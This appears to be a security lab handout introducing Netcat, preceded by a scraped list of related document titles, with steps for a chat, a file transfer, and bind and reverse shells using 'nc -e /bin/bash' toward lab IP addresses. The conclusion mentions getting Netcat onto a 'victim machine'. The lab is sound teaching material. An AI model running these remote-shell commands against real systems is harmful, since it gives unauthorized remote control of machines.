Introduction to using Netcat

Similar documents
Introduction to using Netcat

Netcat Scanning to Backdoors

The Swiss Army Knife netcat

Features of Netcat. Abstract. Keywords. I. Introduction. II. History. Jeffrey Kurcz School of Computer Science University of Windsor

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

Penetration Testing with Kali Linux

DumpsTorrent. Latest dumps torrent provider, real dumps

A. It provides special tunneling, such as UDP to TCP, with the possibility of specifying all network parameters.

DOWNLOAD OR READ : NETCAT POWER TOOLS PAGES PDF EBOOK EPUB MOBI

ETHICAL HACKING LAB SERIES. Lab 13: Exploitation with IPv6

n Given a scenario, analyze and interpret output from n A SPAN has the ability to copy network traffic passing n Capacity planning for traffic

Prerequisite Competencies for NCC 210: Information Security Fundamentals Course

Week Date Teaching Attended 5 Feb 2013 Lab 7: Snort IDS Rule Development

Hackveda Training - Ethical Hacking, Networking & Security

TCP/IP Attack Lab. 1 Lab Overview. 2 Lab Environment. 2.1 Environment Setup. SEED Labs TCP/IP Attack Lab 1

Outline. What is TCP protocol? How the TCP Protocol Works SYN Flooding Attack TCP Reset Attack TCP Session Hijacking Attack

CSE 333 Lecture server sockets

JARGON ALERT! VULNERABILITY SCAN PENETRATION TEST RED TEAM/BLUE TEAM

Introduction to Streaming Video. Steep Learning Curve ahead. Ports. Streaming Video from the Raspberry-Pi Camera c LSGA (Wed 4 Nov 2015) 1

SECURITY+ LAB SERIES. Lab 3: Protocols and Default Network Ports Connecting to a Remote System

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

Russian Cyber Attack Warning and Impact on AccessEnforcer UTM Firewall

Exam4Tests. Latest exam questions & answers help you to pass IT exam test easily

SANS SEC504. Hacker Tools, Techniques, Exploits and Incident Handling.

ACCURATE STUDY GUIDES, HIGH PASSING RATE! Question & Answer. Dump Step. provides update free of charge in one year!

Audience. Pre-Requisites

Secure Communications Over a Network

When does it work? Packet Sniffers. INFO Lecture 8. Content 24/03/2009

netcat Johannes Franken

Fundamentals of Linux Platform Security

Fundamentals of Linux Platform Security. Hands-On Network Security. Roadmap. Security Training Course. Module 1 Reconnaissance Tools

Cyber Common Technical Core (CCTC) Advance Sheet Windows Operating Systems

Project 2-3: Intrusion Detection System

CSCI 4210 Operating Systems CSCI 6140 Computer Operating Systems Homework 4 (document version 1.0) Network Programming using C

ETHICAL HACKING & COMPUTER FORENSIC SECURITY

Firewalls 1. Firewalls. Alexander Khodenko

Lab 4: Protocols and Default Network Ports - Connecting to a Remote System

Man in the middle. Bởi: Hung Tran

Metasploit. Installation Guide Release 4.4

Ethical Hacking : Methodology and techniques

Manual Ftp Windows Server 2008 Firewall Port Forwarding

Appliance Installation Guide

Processes. Shell Commands. a Command Line Interface accepts typed (textual) inputs and provides textual outputs. Synonyms:

McAfee Certified Assessment Specialist Network

4.1.3 Filtering. NAT: basic principle. Dynamic NAT Network Address Translation (NAT) Public IP addresses are rare

Ethical Hacking. Content Outline: Session 1

ETHICAL HACKING LAB SERIES. Lab 3: Using the SYSTEM Account

CPTE: Certified Penetration Testing Engineer

Internet Security: Firewall

SINGLE COURSE. NH9000 Certified Ethical Hacker 104 Total Hours. COURSE TITLE: Certified Ethical Hacker

RESPONDING TO THE MOST COMMON WINDOWS NT/2000 ATTACKS

Operating Systems Design Exam 3 Review: Spring Paul Krzyzanowski

What action do you want to perform by issuing the above command?

SharkFest 17 Europe. #35 Sneaking in The Backdoor. Hacking the Non-Standard Layers. Phill Sherlock Shade. Merlion s Keep Consulting.

Advanced Diploma on Information Security

Manually Ftp Windows Xp Command Line Port Scan

SentinelOne Technical Brief

The flow of transferring the machining programs of the server PC and starting an automatic operation is as below.

ETHICAL HACKING LAB SERIES. Lab 15: Abusing SYSTEMS

Troubleshooting AB Tutor Control Connection problems

CE Advanced Network Security Honeypots

Broadband Router User s Manual. Broadband Router User s Manual

Ethical Hacking and Prevention

Sair 3X Linux Security, Privacy and Ethics (Level 1)

3. Which of the following is a weakness in a system, application, network or process? A. Threat B. Exploit C. Vulnerability D.

ELEC5616 COMPUTER & NETWORK SECURITY

SentinelOne Technical Brief

Advanced Ethical Hacking & Penetration Testing. Ethical Hacking

FREE ONLINE WEBSITE MALWARE SCANNER WEBSITE SECURITY

Configuration Examples

Organization of Product Documentation... xi

Foreword by Katie Moussouris... Acknowledgments... xvii. Introduction...xix. Chapter 1: The Basics of Networking... 1

Certified Ethical Hacker (CEH)

Routers use access lists to control incoming or outgoing traffic. You should know the following characteristics of an access list.

SANS Exam SEC504 Hacker Tools, Techniques, Exploits and Incident Handling Version: 7.1 [ Total Questions: 328 ]

AURA ACADEMY Training With Expertised Faculty Call Us On For Free Demo

Communication Networks ( ) / Fall 2013 The Blavatnik School of Computer Science, Tel-Aviv University. Allon Wagner

National Cyber Storm Competition Hands-On Security Challenges OWASP AppSec Beijing 2013

Ibis Communication Library User s Guide

Jonathan Wald and Jason Zigelbaum (A project report written under the guidance of Prof.

Port Forwarding Setup (NB7)

This ethical hacking course puts you in the driver's seat of a hands-on environment with a systematic process.

Overview. Computer Network Lab, SS Security. Type of attacks. Firewalls. Protocols. Packet filter

Taken from the README of the netcat source tree, this description sums up the uses of netcat perfectly.

Ftp Command Line Manual Windows Example Port 22

Configuring Windows Security Features

Stack-Based Buffer Overflow Explained. Marc Koser. East Carolina University. ICTN 4040: Enterprise Information Security

Internet Architecture

ECCouncil Certified Ethical Hacker. Download Full Version :

ipro-04n Security Configuration Guide

W is a Firewall. Internet Security: Firewall. W a Firewall can Do. firewall = wall to protect against fire propagation

Ethical Hacking Basics Course

Introduction to Ethical Hacking

This is just a continuation of green bug / ISMDOOR. To look at the previous report please go to the following link.

Module 14: SQL Injection

Program-Analysis-Supported Identification of Applications in Large Networks

CS 642 Homework #4. Due Date: 11:59 p.m. on Tuesday, May 1, Warning!

Jackson State University Department of Computer Science CSC / Computer Security Fall 2013 Instructor: Dr. Natarajan Meghanathan

Remote Exploit. compass-security.com 1

Basic Linux Command Line Interface Guide

Transcription:

Introduction to using Netcat Objectives To learn basic features of Netcat that using in security field. Introduction : Netcat is a wonderfully versatile tool which has been dubbed the hackers' Swiss army knife. Netcat is a computer networking service for reading from and writing network connections using TCP or UDP ;this dual functionality suggests that Netcat runs in two modes: client and server. Netcat is designed to be a dependable back-end device that can be used candidly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor. Major features of Netcat are: Outbound or inbound connections, TCP or UDP, to or from any ports Full DNS forward/reverse checking, with appropriate warnings Ability to use any local source port Ability to use any locally-configured network source address Built-in port-scanning capabilities, with randomization Built-in loose source-routing capability Can read command line arguments from standard input Hex dump of transmitted and received data Optional ability to let another program service established connections Optional telnet-options responder Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel. 112

Lab Experiment Requirements: We need for this lab two machines, the first that runs BackTrack 3 and the other runs Windows XP. Procedures : Part 1 : Listening on a TCP/UDP port with Netcat Listening on a TCP/UDP port using Netcat is useful for network debugging client applications, or otherwise receiving a TCP/UDP network connection. Let's try implementing a simple chat using Netcat. 1. From Backtrack : we want to listen on port 4444 and accept incoming connections on this port, type: nc -lvvp 4444 Check to see that port 4444 is indeed listening using netstat You will see listening on [any] 4444... 2. From Windows XP: connect to port 4444 on your Backtrack by typing nc -vv 10.10.136.85 4444 3. After connection established we can start chat as shown in Figure 1 and 2. Figure 1 backtrack Netcat listening for port 4444 ; chat is opened after connection establishment 113

Figure 2 Windows XP establish connection with Backtrack,then simple chat done Part2 : Transferring files with Netcat Netcat can also be used to transfer files from one computer to another. This applies to text and binary files. In order to send a file from Computer 2 to Computer 1, try the following: 1. From Backtrack : We'll set up Netcat to listen to and accept the connection and to redirect any input into a file.type nc -lvp 4444 > output.txt 2. In Windows machine we create text file secu.txt; then we connect to listening Netcat on computer 1 (port 4444) and send the file,type: C:\>nc -vv 192.168.129.1 4444 < test.txt 3. The connection will established and the file will transferred to Backtrack and this is shown in figure 3 and 4 Figure 3 Backtrack listen to 4444 port and accept incoming connection from Windows XP to transfer file 114

Figure 4 Send the file via opened connection to backtrack 4. From backtrack : check that the file was transferred correctly, as shown in figure 5 type: Cat out.txt Figure 5 Check that the file correctly transferred Part 3 : Remote Administration with Netcat (Remote Administration with Netcat): One of Netcat's neat features is command redirection. This means that Netcat can take an exe file and redirect the input, output and error messages to a TCP/UDP port, rather than to the default console. Take for example the cmd.exe executable. By redirecting the stdin/stdout/stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt belonging to this computer. Bind Shell 1. From Backtrack : type C:\>nc -lvvp 4444 -e /bin/bash ;so that Anyone connecting to port 4444 on this machine will be presented with command prompt, with the permissions that nc was run with. As shown in figure 6. 115

Figure 6 Bind shell that when anyone try to connect it will presented by command line 2. From Windows :type nc -v 10.10.36.144 4444 to connect to other machine that listening on port 4444 as illustrated in figure7 ; after connection established you will presented with the shell of Backtrack. Now we can use any available command as we in front of the remote PC.(as example : try ifconfig as shown in figure xxxxx) Remember that ifconfig is used only by linux that means we are sure that we remotely administer backtrack by its shell. Figure 7 After connection ; trying ifconfig on the victim machine Reverse shell Another interesting Netcat feature is the ability to send a command shell to a listening host. So in this situation, although Alice cannot bind a port to cmd.exe locally to her computer and expect Bob to connect, she can send her command prompt to Bob's machine. 1. From Windows :type nc -lvvp 5555 ; now windows is listening on port 5555 and waiting incoming connection. 2. From Backtrack: type nc -v 10.10.36.145 5555 -e /bin/bash ; now you try to connect to windows machine and send your shell (backtrack shell) to it. 3. After connection established we can use backtrack commands : 116

First I try to use unrecognized command, an error message of backtrack appears ; then I try ifconfig that give me the ip of backtrack. Figures 8 and 9 shows this process before connection and after connection reversed with command line of backtrack and simple command execution from remote computer that run windows XP. Figure 8 Windows xp wait connection on port 5555 ; after connection established the shell of the backtrack reveres to XP Figure 9 Backtrack reverse his shell with the connection. 117

Conclusion: Netcat has other nice features and uses such as simple sniffing abilities, port redirection and others which you can learn about if you interested. Now How to I get Netcat to run on the victim machine, without remote user intervention? The answer to this question is simply remote code execution. Ninety percent of attack vectors can be summarized with the pair of words code execution. For example, attacks such as Buffer Overflows, SQL injection, File Inclusion, Client Side Attacks, Trojan Horses - all aim to result in code execution on the victim machine. Simple using for this will be presented in virus and Trojan experiments. 118

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback